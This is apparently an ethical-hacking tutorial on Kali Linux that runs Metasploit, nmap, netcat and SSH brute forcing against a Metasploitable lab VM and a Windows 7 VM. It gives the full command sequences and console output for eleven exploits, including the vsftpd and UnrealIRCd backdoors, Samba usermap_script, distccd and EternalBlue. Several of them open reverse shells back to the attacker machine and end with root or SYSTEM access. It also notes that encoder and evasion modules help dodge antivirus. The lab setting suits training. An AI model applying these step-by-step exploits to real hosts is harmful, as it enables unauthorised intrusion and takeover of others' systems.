|
Getting your Trinity Audio player ready... |
Kali Linux – Exploitation and Gaining Access: An In-Depth Guide
Delve deep into the world of cybersecurity with our comprehensive guide on ‘Kali Linux – Exploitation and Gaining Access’. This article is part of our dedicated series on cybersecurity and ethical hacking techniques.
Understanding Metasploit Framework in Kali Linux
Metasploit Framework, an essential tool in Kali Linux, offers various modules for exploiting vulnerabilities. This section elucidates the framework and its modules.
Key Modules of Metasploit Framework
The Metasploit Framework in Kali Linux consists of several critical modules, each serving unique purposes in the exploitation process.
Utilizing msfconsole and msfvenom
Learn how to navigate through the Metasploit Framework using msfconsole and craft custom payloads with msfvenom.
Real-world Exploitation Scenarios
Explore various real-world exploitation scenarios, demonstrating the practical application of Kali Linux’s tools.
Conclusion
This article offers a profound understanding of how to utilize Kali Linux for effective exploitation and gaining access in various scenarios, providing a crucial skill set for any aspiring cybersecurity professional.
- path to metasplot framework: cd /usr/share/metasploit-framework/
7 Modules metasploit framework contains:
- exploits (buffer overflow, code injection, web application)
- auxiliary (does not execute a payload as an explot module does, but istead it is used to perform different actions such as scanning, fuzzing or denial of service attack. Information gateringand, fingerprinting, scanning )
- post (used as the name, after exploiting the target, gather or steal information from target device: files, saved passwords, dumping hashes, enummerationg services and applications on the target)
- payloads (deliver to the target with and exploit in order to control the machine: singles are payloads that are completly stand alone | stagers are estting up a network connection between the attacker and the victim, are small and reliable (bind or reverse (almost all the time we will use reverse tcp) ) | stages are payload components that are downloaded by stagers modules, can provide advanced features with no size limit example: meterpreters shells (mallware, trojan or virus) that can download files, upload files, record microphone, run webcam, take screenshots, etc)
- encoders (helps evade antivirus detection)
- evasion (similat ro encoders, mainly designed to evade windows defender)
- nops (no-operation is an instruction for the processor to do nothing, useful in buffer overflow to allocate a lot of space in memory before the payload executes)
msfconsole and msfvenom
To run metasplot framework simply run msfconsole in the terminal
- use show payloads command to list all the payloads
- to use a certain exploit use the command: use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
- use show info to get more details about what the particular module exploit can do
- use show options to understand what the module needs to function
- use set <parameter name> example LHOST to change the default already configured IP address
- using show payloads again will now not list again all the payloads but rather just the ones that are compatible with the ceratl selected explot
- use set payload <payload name> t change the default selected payload with another one you have chosen
- use show targets to get a full list of targets that we can exploit using this attack
- use set target 3 to select the 3rd option listed by running the command above
- use exploit to enable/run the exploit
Example 1 – vsftpd 2.3.4
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
- the goal is to find an explot if this software is vulnerable
- as an initial action, before google-ing for possible exploits, you can use metasploit framework
- on terminal2: run $ searchsploit vsftpd 2.3.4
- on terminal3: run msfconsole and then type: msf6 > search vsftpd
- msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.222.127:21 – USER: 331 Please specify the password.
[+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
[+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link
- to exit a shell just type: exit
exit
[*] 192.168.222.127 – Command shell session 1 closed.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Example 2 – Misconfiguration bindshell
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 1524/tcp open bindshell Metasploitable root shell
- on terminal2 let’s use a tool called: netcat (a program used to extablish network connections with other machines using both tcp and udp)
- to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
[v1.10-46]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port] - to use it run:
┌──(mrhacker㉿kali)-[~/Desktop]
└─$ nc 192.168.222.127 1524
root@metasploitable:/#
Example 3- telnet
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 23/tcp open telnet Linux telnetd
- on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
- let’s try the default login and username: telnet 192.168.222.127
┌──(mrhacker㉿kali)-[~]
└─$ telnet 192.168.222.127
Trying 192.168.222.127…
Connected to 192.168.222.127.
Escape character is ‘^]’.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin# whoami
root
root@metasploitable:/home/msfadmin#
Example 4- Samba
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
- on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
- let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
- msf6 auxiliary(scanner/smb/smb_version) > show info
- msf6 auxiliary(scanner/smb/smb_version) > show options
- msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
- msf6 auxiliary(scanner/smb/smb_version) > exploit
- valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
- on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit) – unix/remote/16320.rb
- on terminal2: run $ search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
- msf6 > use exploit/multi/samba/usermap_script
- msf6 exploit(multi/samba/usermap_script) > show info
- msf6 exploit(multi/samba/usermap_script) > show options
- msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
msf6 exploit(multi/samba/usermap_script) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400whoami
root
Example 5- Buteforce SSH Attack
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
- on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
- msf6 > use auxiliary/scanner/ssh/ssh_login
- on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possile usernames but also containing the corect one: admin, root, toor, user123, msfadmin, admin123 | one per line
- on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possile usernames but also containing the corect one: password, password123, helloworld, msfadmin, test1234 | one per line
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
PASS_FILE => /home/mrhacker/Desktop/passwords.txt - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
USER_FILE => /home/mrhacker/Desktop/usernames.txt - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127 - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true - msf6 auxiliary(scanner/ssh/ssh_login) > exploit
- [+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
[-] 192.168.222.127:22 – Failed: ‘admin123:password’ - msf6 auxiliary(scanner/ssh/ssh_login) > sessions
- msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1…whoami
msfadmin
sudo su
[sudo] password for msfadmin: msfadminwhoami
root - as we now have the username and passowrd we could ssh into the machine using the discuvered username and password: msfadmin/msfadmin
- ┌──(mrhacker㉿kali)-[~]
└─$ ssh [email protected]
[email protected]’s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Example 6 – distccd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- on terminal2: msfconsole and the run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
- msf6 > use exploit/unix/misc/distcc_exec
- msf6 exploit(unix/misc/distcc_exec) > show options
- msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
- msf6 exploit(unix/misc/distcc_exec) > show payloads
- msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse - msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listenig host)
LHOST => 192.168.222.59 - msf6 exploit(unix/misc/distcc_exec) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 9JUz23ZkTBY4MuQx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “9JUz23ZkTBY4MuQx\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400whoami
daemon
hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 7 – distccd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
- on terminal3: msfconsole and the run: msf6 > search UnrealIRCd
- msf6 > use 0
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
- eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
LHOST => 192.168.222.59 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
[*] 192.168.222.127:6667 – Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo FtAIdHWFZQ9qDwWD;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “FtAIdHWFZQ9qDwWD\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400whoami
roothostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 8 – drb
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
- on terminal3: msfconsole and the run: msf6 > search drb
- msf6 > use exploit/linux/misc/drb_remote_codeexec
- (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)
Example 9 – vnc
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
- on terminal3: msfconsole and the run: msf6 > search vnc
- this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
- let’s try to connect to VNC on the target machine:
- (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: password | the password was password
Authentication successful
Example 10- java-rmi
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
- on terminal2: msfconsole and the run: msf6 > search java rmi
- msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp - msf6 exploit(multi/misc/java_rmi_server) > show options
- msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
- msf6 exploit(multi/misc/java_rmi_server) > run
- msf6 exploit(multi/misc/java_rmi_server) > show sessions
- msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
- meterpreter > help
- meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
Example 11 – Windows 7 x64 – Eternalblue NSA-developed Explot
- check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
- on terminal1: run sudo nmap -sS 192.168.222.205
- let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
- on terminal2: msfconsole and then run msf6 > search eternalblue
- let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
- msf6 > use 4
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
- msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205RHOSTS => 192.168.222.205
msf6 auxiliary(scanner/smb/smb_ms17_010) >[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > - on terminal2: msfconsole and then run msf6 > search eternalblue
- let’s use this one to test if the target is vulnerable: “exploit/windows/smb/ms17_010_eternalblue”
- msf6 > use 0
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
- msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
RHOSTS => 192.168.222.205
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[+] 192.168.222.205:445 – The target is vulnerable.
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] 192.168.222.205:445 – Connecting to target for exploitation.
[+] 192.168.222.205:445 – Connection established for exploitation.
[+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
[*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
[*] 192.168.222.205:445 – Starting non-paged pool grooming
[+] 192.168.222.205:445 – Sending SMBv2 buffers
[+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.222.205:445 – Sending final SMBv2 buffers.
[*] 192.168.222.205:445 – Sending last fragment of exploit packet!
[*] 192.168.222.205:445 – Receiving response from exploit packet
[+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.222.205:445 – Sending egg to corrupted connection.
[*] 192.168.222.205:445 – Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.222.205
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > help
meterpreter > screenshot
Screenshot saved to: /home/mrhacker/Desktop/OvtUHTeu.jpeg
meterpreter >
